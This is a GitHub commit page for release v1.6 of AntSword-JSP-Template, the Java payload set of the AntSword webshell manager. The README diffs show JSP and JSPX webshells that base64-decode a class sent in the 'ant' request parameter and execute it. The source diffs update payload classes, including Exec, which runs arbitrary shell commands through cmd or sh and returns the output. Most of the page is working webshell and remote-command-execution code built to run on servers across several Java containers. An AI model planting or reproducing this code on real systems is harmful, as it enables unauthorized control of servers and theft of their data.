Skip to content

Commit

Permalink
Merge pull request #6 from AntSwordProject/dev
Browse files Browse the repository at this point in the history 
release v1.6
  • Loading branch information
@yzddmr6
yzddmr6 authored May 14, 2021
2 parents b94c067 + 46bfcc4 commit 54316e2
Show file tree
Hide file tree
Showing 36 changed files with 1,336 additions and 1,057 deletions.
35 changes: 29 additions & 6 deletions README.md
View file
Original file line number Diff line number Diff line change
@@ -1,4 +1,4 @@
# AntSword-JSP-Template v1.5
# AntSword-JSP-Template v1.6

中国蚁剑JSP一句话Payload

Expand Down Expand Up @@ -76,7 +76,7 @@ shell.jsp
<%
String cls = request.getParameter("ant");
if (cls != null) {
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(new Object[]{request,response});
}
%>
```
Expand Down Expand Up @@ -113,12 +113,28 @@ shell.jspx
<jsp:scriptlet>
String cls = request.getParameter("ant");
if (cls != null) {
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(new Object[]{request,response});
}
</jsp:scriptlet>
</jsp:root>
```
其中`pageContext`可以替换为`request`,以实现对内存Webshell的兼容。
其中

`new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(new Object[]{request,response});`

可以替换为

`new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);`

这种写法支持Tomcat/Weblogic,不支持如SpringBoot等不自带pageContext的容器。

或者

`new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(request);`

这种写法支持Tomcat/SpringBoot/Weblogic等容器。原理是使用反射自动从request中提取出response,遇到比较特殊的容器可能会提取失败。

后两种为不推荐的写法,可能会在未来移除。

## 解码器

Expand Down Expand Up @@ -173,10 +189,17 @@ $ base64 -w 0 AsoutputReverse.class
}
```


## 更新日志

### v1.5
### v 1.6


1. equals支持数组传参方式,兼容各种容器
2. build.py中可以手动指定版本号编译,不再需要下载指定jdk
3. 部分变量转为类属性,方便调试
4. 修正 insert/update/delete 语句无法执行问题

### v 1.5

1. 支持解码器(返回包加密)
2. 修复base64编码问题&改正错别字
Expand Down
7 changes: 5 additions & 2 deletions build.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -11,6 +11,8 @@

# javac路径 如果 javac 不在 PATH 中, 请自己添加
javapath = r'javac'
# javac编译版本
version = '1.5'

pathsep = os.pathsep
distDir = "./dist/"
Expand All @@ -28,10 +30,11 @@
path = os.path.join(root, f)
print('------------------------------------------------------------')
print(path)
cmd = '"{javapath}" -cp {classpath} {path}'.format(
cmd = '"{javapath}" -cp {classpath} -source {version} -target {version} {path} '.format(
javapath=javapath,
classpath=classpath,
path=path
path=path,
version=version
)
print(cmd)
p=subprocess.Popen(
Expand Down
69 changes: 38 additions & 31 deletions src/base/Info.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -8,40 +8,15 @@
public class Info {
public HttpServletRequest request = null;
public HttpServletResponse response = null;
public String encoder;
public String cs;
public String randomPrefix;
public String encoder = "base64";
public String cs = "antswordCharset";
public String randomPrefix = "antswordrandomPrefix";
public String decoderClassdata;

@Override
public boolean equals(Object obj) {
try {
Class clazz = Class.forName("javax.servlet.jsp.PageContext");
request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj);
response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj);
} catch (Exception e) {
if (obj instanceof HttpServletRequest) {
request = (HttpServletRequest) obj;
try {
Field req = request.getClass().getDeclaredField("request");
req.setAccessible(true);
HttpServletRequest request2 = (HttpServletRequest) req.get(request);
Field resp = request2.getClass().getDeclaredField("response");
resp.setAccessible(true);
response = (HttpServletResponse) resp.get(request2);
} catch (Exception ex) {
try {
response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj);
} catch (Exception ignored) {

}
}
}
}
randomPrefix = "antswordrandomPrefix";
encoder = "base64";
cs = "antswordCharset";
StringBuffer output = new StringBuffer("");
this.parseObj(obj);
StringBuffer output = new StringBuffer();
String tag_s = "->|";
String tag_e = "|<-";
String varkeydecoder = "antswordargdecoder";
Expand Down Expand Up @@ -86,10 +61,42 @@ String WwwRootPathCode(String d) {
return s.toString();
}

public void parseObj(Object obj) {
if (obj.getClass().isArray()) {
Object[] data = (Object[]) obj;
request = (HttpServletRequest) data[0];
response = (HttpServletResponse) data[1];
} else {
try {
Class clazz = Class.forName("javax.servlet.jsp.PageContext");
request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj);
response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj);
} catch (Exception e) {
if (obj instanceof HttpServletRequest) {
request = (HttpServletRequest) obj;
try {
Field req = request.getClass().getDeclaredField("request");
req.setAccessible(true);
HttpServletRequest request2 = (HttpServletRequest) req.get(request);
Field resp = request2.getClass().getDeclaredField("response");
resp.setAccessible(true);
response = (HttpServletResponse) resp.get(request2);
} catch (Exception ex) {
try {
response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj);
} catch (Exception ignored) {

}
}
}
}
}
}

public String asoutput(String str) {
try {
byte[] classBytes = Base64DecodeToByte(decoderClassdata);
java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class});
java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
defineClassMethod.setAccessible(true);
Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length);
return cc.getConstructor(String.class).newInstance(str).toString();
Expand Down
70 changes: 38 additions & 32 deletions src/base/Probedb.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -7,41 +7,15 @@
public class Probedb {
public HttpServletRequest request = null;
public HttpServletResponse response = null;
public String encoder;
public String cs;
public String randomPrefix;
public String encoder = "base64";
public String cs = "antswordCharset";
public String randomPrefix = "antswordrandomPrefix";
public String decoderClassdata;

@Override
public boolean equals(Object obj) {
try {
Class clazz = Class.forName("javax.servlet.jsp.PageContext");
request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj);
response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj);
} catch (Exception e) {
if (obj instanceof HttpServletRequest) {
request = (HttpServletRequest) obj;
try {
Field req = request.getClass().getDeclaredField("request");
req.setAccessible(true);
HttpServletRequest request2 = (HttpServletRequest) req.get(request);
Field resp = request2.getClass().getDeclaredField("response");
resp.setAccessible(true);
response = (HttpServletResponse) resp.get(request2);
} catch (Exception ex) {
try {
response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj);
} catch (Exception ignored) {

}
}
}
}

randomPrefix = "antswordrandomPrefix";
encoder = "base64";
cs = "antswordCharset";
StringBuffer output = new StringBuffer("");
this.parseObj(obj);
StringBuffer output = new StringBuffer();
String tag_s = "->|";
String tag_e = "|<-";
String varkeydecoder = "antswordargdecoder";
Expand Down Expand Up @@ -83,10 +57,42 @@ String ProbedbCode(HttpServletRequest r) {
return ret;
}

public void parseObj(Object obj) {
if (obj.getClass().isArray()) {
Object[] data = (Object[]) obj;
request = (HttpServletRequest) data[0];
response = (HttpServletResponse) data[1];
} else {
try {
Class clazz = Class.forName("javax.servlet.jsp.PageContext");
request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj);
response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj);
} catch (Exception e) {
if (obj instanceof HttpServletRequest) {
request = (HttpServletRequest) obj;
try {
Field req = request.getClass().getDeclaredField("request");
req.setAccessible(true);
HttpServletRequest request2 = (HttpServletRequest) req.get(request);
Field resp = request2.getClass().getDeclaredField("response");
resp.setAccessible(true);
response = (HttpServletResponse) resp.get(request2);
} catch (Exception ex) {
try {
response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj);
} catch (Exception ignored) {

}
}
}
}
}
}

public String asoutput(String str) {
try {
byte[] classBytes = Base64DecodeToByte(decoderClassdata);
java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class});
java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
defineClassMethod.setAccessible(true);
Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length);
return cc.getConstructor(String.class).newInstance(str).toString();
Expand Down
75 changes: 40 additions & 35 deletions src/command/Exec.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -13,40 +13,15 @@
public class Exec {
public HttpServletRequest request = null;
public HttpServletResponse response = null;
public String encoder;
public String cs;
public String randomPrefix;
public String encoder = "base64";
public String cs = "antswordCharset";
public String randomPrefix = "antswordrandomPrefix";
public String decoderClassdata;

@Override
public boolean equals(Object obj) {
try {
Class clazz = Class.forName("javax.servlet.jsp.PageContext");
request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj);
response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj);
} catch (Exception e) {
if (obj instanceof HttpServletRequest) {
request = (HttpServletRequest) obj;
try {
Field req = request.getClass().getDeclaredField("request");
req.setAccessible(true);
HttpServletRequest request2 = (HttpServletRequest) req.get(request);
Field resp = request2.getClass().getDeclaredField("response");
resp.setAccessible(true);
response = (HttpServletResponse) resp.get(request2);
} catch (Exception ex) {
try {
response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj);
} catch (Exception ignored) {

}
}
}
}
randomPrefix = "antswordrandomPrefix";
encoder = "base64";
cs = "antswordCharset";
StringBuffer output = new StringBuffer("");
this.parseObj(obj);
StringBuffer output = new StringBuffer();
String tag_s = "->|";
String tag_e = "|<-";
String varkey1 = "antswordargbin";
Expand Down Expand Up @@ -101,7 +76,7 @@ String decode(String str) throws Exception {
}

public String ExecuteCommandCode(String cmdPath, String command, String envstr) throws Exception {
StringBuffer sb = new StringBuffer("");
StringBuffer sb = new StringBuffer();
String[] c = {cmdPath, !isWin() ? "-c" : "/c", command};
Map<String, String> readonlyenv = System.getenv();
Map<String, String> cmdenv = new HashMap<String, String>(readonlyenv);
Expand All @@ -127,9 +102,7 @@ public String ExecuteCommandCode(String cmdPath, String command, String envstr)
boolean isWin() {
String osname = System.getProperty("os.name");
osname = osname.toLowerCase();
if (osname.startsWith("win"))
return true;
return false;
return osname.startsWith("win");
}

void CopyInputStream(InputStream is, StringBuffer sb) throws Exception {
Expand All @@ -141,10 +114,42 @@ void CopyInputStream(InputStream is, StringBuffer sb) throws Exception {
br.close();
}

public void parseObj(Object obj) {
if (obj.getClass().isArray()) {
Object[] data = (Object[]) obj;
request = (HttpServletRequest) data[0];
response = (HttpServletResponse) data[1];
} else {
try {
Class clazz = Class.forName("javax.servlet.jsp.PageContext");
request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj);
response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj);
} catch (Exception e) {
if (obj instanceof HttpServletRequest) {
request = (HttpServletRequest) obj;
try {
Field req = request.getClass().getDeclaredField("request");
req.setAccessible(true);
HttpServletRequest request2 = (HttpServletRequest) req.get(request);
Field resp = request2.getClass().getDeclaredField("response");
resp.setAccessible(true);
response = (HttpServletResponse) resp.get(request2);
} catch (Exception ex) {
try {
response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj);
} catch (Exception ignored) {

}
}
}
}
}
}

public String asoutput(String str) {
try {
byte[] classBytes = Base64DecodeToByte(decoderClassdata);
java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class});
java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
defineClassMethod.setAccessible(true);
Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length);
return cc.getConstructor(String.class).newInstance(str).toString();
Expand Down
Loading

0 comments on commit 54316e2

Please sign in to comment.